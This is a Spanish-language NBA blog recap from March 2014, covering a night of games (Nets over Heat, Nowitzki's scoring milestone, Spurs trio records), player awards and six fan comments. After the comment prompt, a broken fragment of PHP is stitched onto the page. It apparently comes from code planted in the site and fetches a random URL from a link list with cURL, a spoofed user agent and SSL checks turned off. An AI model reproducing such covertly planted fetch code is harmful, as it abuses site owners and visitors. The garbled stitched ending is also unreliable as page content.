La Crónica: Los Nets cogen la medida a los Heat

13 de March de 2014 por Simon

Muchos duelos interesantes en la jornada de ayer que además nos dejan algunos cambios en la clasificación. La gran noticia del día fue la nueva victoria, y ya van tres de tres esta temporada, de los Nets ante Miami con un excelso Paul Pierce. Los de Jason Kidd se confirmaron como la bestia negra particular de Lebron y compañía que atraviesan uno de los peores momentos de la temporada tras haber perdido 4 de los últimos 5 partidos justo cuando estaban en disposición de superar a Indiana en lo alto de la clasificación del Este. El partido fue muy igualado, con muchos empates y alternancia en el marcador pero al final la moneda cayó del lado de Brooklyn. Con los Heat con bola para ganar el partido, Shaun Livingston hizo gala de manos rápidas e interceptó el pase dirigido a Lebron James (96-95). Con esta victoria los Nets ascienden al quinto puesto de la conferencia aprovechando la derrota que sufrieron en casa los Washington Wizards que no encontraron la manera de frenar a un Al Jefferson que tiene a sus Bobcats cómodamente instalados en la séptima plaza (98-85). Los Wizards fueron de más a menos. Lo que parecía una victoria sencilla  durante el primer cuarto se convirtió en un partido a cara de perro en el segundo y tercero y terminó siendo una pesadilla en el último. 

La jornada de ayer ayudó a clarificar un poco más la clasificación para los Play Off en el Oeste. Tantos Memphis Grizzlies como Dallas Mavericks hicieron los deberes y no fallaron a pesar de disputar partidos a domicilio. Memphis sufrió hasta el último segundo para superar  a los Pelicans. La defensa de los Grizzlies asfixió a New Orleans en el último cuarto y Mike Conley anotó la canasta que daba la victoria a los suyos a falta de un segundo (90-88). En la victoria de los Mavs sobre Utah Jazz (108-101), Dirk Nowitzki se convirtió en el duodécimo máximo anotador de la historia de la NBA. Los Jazz no lo pusieron fácil y Dallas tuvo que emplearse a fondo para no dejar escapar una victoria importante que aumentaba la distancia con los Suns. A pesar de la vuelta de Eric Bledsoe, los de Phoenix se vieron sorprendidos en su propia cancha por los Cleveland Cavaliers y cosechan su tercera derrota consecutiva que les aleja de los Play Off (110-101).

No fallan los Clippers, que lograron ayer su novena victoria consecutiva y se afianzan en el tercer lugar de la conferencia. Blake Griffin sigue demostrando el salto de calidad que ha dado este año y con una gran actuación cerró las puertas  a la sorpresa de los Warriors en el Staples (98-111). 7 fueron los jugadores de Doc Rivers que estuvieron por encima de los 10 puntos en anotación, destacando los 18 puntos desde el banquillo de Danny Granger que parece haber encajado en los Clippers a la perfección. A pesar de su buen momento, pocas opciones tienen los Clippers de seguir escalando puestos en su conferencia pues los dos primeros tienen una buena ventaja y además no suelen fallar. Los Spurs, que una vez que han recuperado a todos sus efectivos vuelven a funcionar como una máquina, no dieron ayer opción a los Blazers a pesar de haber jugado la noche anterior en Chicago. San Antonio volvió a dar una lección de juego colectivo con 8 hombres con 9 o más puntos y con 10 jugadores, todos los que jugaron una cantidad de minutos considerable, asistiendo a algún compañero (90-103). Con esta victoria, Duncan, Parker y Ginobili empatan con Magic, Cooper y Jabbar en la 2ª posición de trios de jugadores con más victorias (490). Por delante solo quedan Bird, McHale y Parish con 540.

En el resto de la jornada, los Raptors no tuvieron problemas en deshacerse de los Detroit Pistons  y continúan afianzados en su tercera plaza del Este (87-101). Los New York Knicks siguen recortando distancias en su pelea por los Play Off y lograron una sorprendente, por fácil, victoria en el siempre complicado TD Garden de Boston (116-92).Los otros dos partidos que completaban la jornada apenas tenían aliciente puesto que los disputaban equipos que ya tienen perdida ya la temporada. Denver ganó en Orlando (120-112) con un gran partido de Faried que ya piensa en su contrato de la temporada que viene después de una temporada gris. Por su parte, los Kings aprovecharon el regalo que es enfrentar hoy en día a los Sixers para vencer con comodidad y abandonar la última plaza del Oeste (115-98).

PREMIOS

MVP: 31 puntos con un 12 de 14 en tiros de campo y un 4 de 4 en triples y 8  rebotes. Grandes números de un viejo rockero como Dirk Nowitzki que se resiste a dejar de tocar la guitarra.

Rookie: Tim Hardaway Jr. alcanzó los 22 puntos, Trey Burke 20 y Ben McLemore y Victor Oladipo se quedaron en 15.

Sorpresa: El traspaso de Spencer Hawes le ha dado el puesto de titular en los Sixes a Henry Sims que no lo está haciendo mal. Anoche fueron 20 puntos, 10 rebotes, 3 asistencias, 3 robos y 2 tapones en 31 minutos. Otro pívot, nuestro ídolo Cole Aldrich, aprovechó también los minutos que le dieron las bajas de Chandler, Bargnani, Martin y Stoudamire. 12 puntos, 10 rebotes y 3 tapones en apenas 25 minutos.

Decepción: Esta vez tocó el partido pobre de Trevor Ariza que solo anotó 7 puntos y perdió 4 balones. Steve Blake y Jordan Crawford salieron desde el banco de los Warriors y hundieron a su equipo.  Entre ambos consiguieron 0 puntos con un 0 de 11, 1 rebote y 1 asistencia.

Esfuerzo en vano: Una canasta en los últimos segundos de Mike Conley privó a Anthony Davis de conseguir la victoria. Sus 29 puntos, 10 rebotes y 4 tapones se quedaron finalmente sin premio.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    La verdad es que la serie de partidos de Faried en este tramo final de temporada,cuando su equipo no se juega nada ya,está siendo divertida,sobre todo para uno que lo lleva en la hoops xDD En general todas estas rachas de dejarse perder,hay que ganar,rotaciones,etc,influyen la pera.A ver dónde y por cuánto juega el bueno de Manimal la temporada que viene.

      Citar

  2. rumbero dice:
    #2

    Les está funcionando muy bien a los Nets eso de jugar con quintetos pequeños y con Deron y Livingston compartiendo pista durante bastantes minutos. Y luego esa segunda unidad en la que Blatche lo hace siempre bien y el resto se va repartiendo para ver quien le toca hacer buen partido. Ayer muy bien Teletovic.
    Siguen sin ser el equipo más divertido de la NBA con ese ritmo lento a pocas posesiones, pero cada vez defienden mejor y parece que se van encontrando. Ojalá sigan así para darle algo de vidilla a los PO del este

      Citar

  3. HisRoyalAirness dice:
    #3

    Lo del número de victorias del trio de los Spurs, que se quedarán en el top 3 con los Lakers de los 80 y los Celtics de los 80 es de mucha grandeza. Este equipo merece mucho más reconocimiento del que tiene, además viniendo de un mercado sin parangón en comparación con los otros dos.
    RESPECT

      Citar

  4. rumbero dice:
    #4

    HisRoyalAirness:
    Lo del número de victorias del trio de los Spurs, que se quedarán en el top 3 con los Lakers de los 80 y los Celtics de los 80 es de mucha grandeza. Este equipo merece mucho más reconocimiento del que tiene, además viniendo de un mercado sin parangón en comparación con los otros dos.
    RESPECT

    Uno se olvida de lo que vienen haciendo estos tíos. (Lo leía el otro día) Desde que llegó Duncan, hace 17 temporadas, SIEMPRE han pasado del 60% de victorias en regular con 9 temporadas por encima del 70% (y con esta seguramente serán 10). Una auténtica barbaridad.

      Citar

  5. txusma dice:
    #5

    rumbero: Uno se olvida de lo que vienen haciendo estos tíos. (Lo leía el otro día) Desde que llegó Duncan, hace 17 temporadas, SIEMPRE han pasado del 60% de victorias en regular con 9 temporadas por encima del 70% (y con esta seguramente serán 10). Una auténtica barbaridad.

    No en vano hablamos del mejor ala-pívot de la historia.

      Citar

  6. HisRoyalAirness dice:
    #6

    txusma: No en vano hablamos del mejor ala-pívot de la historia.

    By far

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>